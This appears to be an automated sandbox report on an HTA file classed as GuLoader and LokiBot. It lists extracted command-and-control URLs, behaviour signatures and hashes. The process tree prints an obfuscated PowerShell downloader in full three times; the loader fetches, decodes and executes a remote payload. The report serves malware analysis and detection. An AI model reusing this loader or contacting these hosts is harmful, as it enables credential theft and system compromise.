Overview

overview

10

Static

static

1

LV24-0926.hta

windows7-x64

10

LV24-0926.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-09-2024 11:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LV24-0926.hta

  • Size

    7KB

  • MD5

    b604a446f056b778a22cf7ea6a6676ae

  • SHA1

    c198b474688cc106f9fc06cc6b9e569613f5e689

  • SHA256

    3023bc189f377a809d054529454fa9e35af817f3c9c3646c15d2d4da468676bf

  • SHA512

    4f54f91862b9fe8494cefbca8dae42cc930839206508fae41e0d3688b12a5e7bafa1eb0da6369daaa77af6db62cac02360b217a1a090a904b3a2720cdd6edd4e

  • SSDEEP

    192:hlN6ZVy2gAkJkhRg9e+UEmOVYpUVM2vy6n2MbIv:hqZVy2COhDNG1v9LIv

Score
10/10
guloaderlokibotcollectiondiscoverydownloaderspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LV24-0926.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2632
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1388

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FUCI975F5CJHH118Z76.temp
    Filesize

    7KB

    MD5

    da11dc499029ac583db3eacbfc42ab9c

    SHA1

    05bba6d5eb9f2942ce034e15cb089f4d5bdbcc5b

    SHA256

    a838e8df78d451753abf2ed79fe25528950b879de4783a162b5f6e4232b07f69

    SHA512

    f7c53c7d725f8c3173db6ba776f7fdb9391d0e1696537d1d4cce740691ac85bd97edfcf3d4ec049b1c8d421c6a42e473010cba61bbe518cc9ffb43dcf38c7434

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    a2c659ec249295386a76e9ec180bb9f3

    SHA1

    747b5228df09fc3973fb8cd80027031a902cde89

    SHA256

    3ab6278a0247258bd0000e76f158546e806d81dad4e91e88923ac59913bdfa59

    SHA512

    e4eb89303a9b7feec280ab7862c00810b663557fef882b517de65ce5e589af6eae5420dcd88a2c1b7ce5eca142f4efae8c84a1092dce46ba263c58f4ebb7f684

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Relativitetsteoriernes.Ove
    Filesize

    456KB

    MD5

    4720451553542bd139f9545c55cb3004

    SHA1

    8368cf6dd617edd586bd689124d6fd6ed7764268

    SHA256

    8a0447898832d6e21f1b1037a28eaa2ebd3cdc4f2a49b9971d52c60eb01cf38f

    SHA512

    215bd65fb55ce03cc1300821645813e754cf05956e1ee8f30e657d86aa4ee707f2cfb0c6bc6818c115e168595bd3239cdce97b723ba970e4ecaf90580bcf3df4

    Download Submit

  • memory/1388-41-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1388-44-0x0000000000940000-0x0000000003B3A000-memory.dmp

    Filesize

    50.0MB

    Download

  • memory/2180-21-0x0000000006770000-0x000000000996A000-memory.dmp

    Filesize

    50.0MB

    Download

  • memory/2632-13-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2632-14-0x00000000002B0000-0x00000000002B8000-memory.dmp

    Filesize

    32KB

    Download